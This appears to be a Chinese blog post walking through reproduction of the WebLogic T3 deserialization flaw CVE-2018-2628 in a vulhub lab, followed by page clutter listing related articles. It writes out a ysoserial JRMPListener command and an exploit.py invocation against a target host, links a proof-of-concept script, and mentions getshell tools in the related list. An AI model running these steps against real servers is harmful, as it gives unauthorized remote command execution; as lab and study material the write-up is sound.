Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628 漏洞复现

最新推荐文章于 2024-05-13 06:09:10 发布
最新推荐文章于 2024-05-13 06:09:10 发布
阅读量291 收藏 1
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114264611
版权

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

by ADummy

0x00利用路线

​ 启动一个JRMP Server—>执行exp文件—>命令执行

0x01漏洞介绍

​ 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。

影响版本
 Weblogic 10.3.6.0
 Weblogic 12.1.3.0
 Weblogic 12.2.1.2
 Weblogic 12.2.1.3

0x02漏洞复现

快速检测利用nmap --script=weblogic-t3-infi.nse

首先下载ysoserial,并启动一个JRMP Server:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

其中,[command]即为我想执行的命令,而[listen port]是JRMP Server监听的端口。

然后,使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包:

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

其中,[victim ip][victim port]是目标weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路径,[JRMPListener ip][JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClientJRMPClient2

exploit.py执行完成后,执行docker-compose exec weblogic bash进入容器中,可见/tmp/success已成功创建。

在这里插入图片描述
在这里插入图片描述

0x03参考资料

https://blog.csdn.net/csacs/article/details/87122472

poc:https://github.com/ADummmy/vulhub_Writeup/blob/main/code/Weblogic_WLS_Core_Components_CVE_2018_2628.py

ADummy_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6876
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
weixin_63960760的博客
09-12 1074
1、漏洞描述Weblogic Server WLS Core Components反序列化命令执行漏洞CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令2、漏洞影响版本3、漏洞成因攻击者利用RMI绕过weblogic黑名单限制,将加载的内容利用readObject解析,造成反序列化漏洞,该漏洞主要由于T3协议触发,所有开放weblogic控制台7001端口,默认开启T3服务,攻击者发送构造好的T3协议数据,获取目标服务器的权限。
weblogic CVE-2018-2628复现
Armandhe的博客
06-15 2923
无言
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
最新发布
2301_77121488的博客
05-13 917
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。
Weblogic漏洞复现——CVE-2018-2628
网安小白的博客
08-07 348
Weblogic反序列化漏洞复现CVE-2018-2628图文详解(含kali安装docker及vulhub)
weblogic cve-2018-2628复现
sojrs_sec的博客
12-24 878
前言 前面有分析过cve-2017-10271的xml反序列化漏洞,这次挑了cve-2018-2628尝试着分析看看,相比较xml反序列化只要一个http包而言,T3协议的反序列化利用过程显得更加复杂一些,因此在正式分析之前,这里做个简单先把复现的过程记录一下 环境 被攻击机 192.168.99.37 Ubuntu16 Vulhub 攻击机 Mac 192.168.96.111 复现步骤 Ubu...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2018-3191利用exp
01-08
在本案例中,ysoserial被用来创建能够触发CVE-2018-3191的序列化对象。通过精心构造的序列化数据,攻击者可以绕过常规的安全措施,实现远程代码执行,这可能导致服务器被完全控制,数据被盗或者系统被进一步破坏。 ...
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是Weblogic自动更新机制的一部分,负责在Windows系统上自动安装和管理补丁。攻击者可以利用此漏洞构造...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
漏洞主要存在于WebLogic WLS Core Components组件的`weblogic.utils.classloaders.GenericClassLoader`类中。在处理HTTP请求时,该类不正确地处理了反序列化的数据,没有进行足够的输入验证和安全检查。攻击者可以...
CVE-2018-2628-检测与getshell工具-含使用说明书.zip
12-03
CVE-2018-2628-检测与getshell工具-含使用说明书,属于WebLogic 反序列化远程代码执行漏洞
Weblogic反序列化漏洞复现(CVE-2018-2628)
DaWan
09-21 996
Weblogic反序列化漏洞(CVE-2018-2628环境搭建工具准备漏洞复现 环境搭建 使用vulhub进行环境搭建,具体的步骤可以自行百度 工具准备 下载ysoserial,为了启动JRMP Server EXP地址:https://www.exploit-db.com/exploits/44553 漏洞复现 使用namp查看是否启用T3协议: nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161 启动JRMP Se
weblogic CVE-2018-2628 环境搭建和漏洞复现
weixin_51203422的博客
11-18 4146
cve-2018-2628 weblogic 漏洞复现,简单
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
黑白的博客
12-06 507
声明 好好学习,天天向上 漏洞描述 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 影响范围 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 这里使用10.3.6.0版本 使用vulhub cd /app/vulhub-mas
weblogic CVE-2018-2628漏洞利用工具
weixin_30294021的博客
07-13 1322
weblogic CVE-2018-2628漏洞利用 漏洞环境: Windows2018R2 weblogic10.3.6 漏洞利用过程: 搭建好存在CVE-2018-2628漏洞weblogic平台 使用工具获得shell 运行脚本,执行命令 漏洞利用工具: 本文仅用于漏洞学习利用,禁止非法利...
WebLogic反序列化漏洞CVE-2018-2628漏洞检测与利用
a1b2c3是弱口令
12-08 5160
Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可导致远程代码执行漏洞漏洞威胁等级为高危,对应的CVE编号为CVE-2018-26 影响版本 Oracle WebLogic Server10.3.6.0 Oracle WebLogic Server12.2.1.2 Oracle WebLogic Serv...
WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)漏洞复现
lc0813的博客
04-13 1484
漏洞概述: 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。 名词概念: 序列化:序列化 (Serialization)是将对象的状态...
以下Weblogic漏洞反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值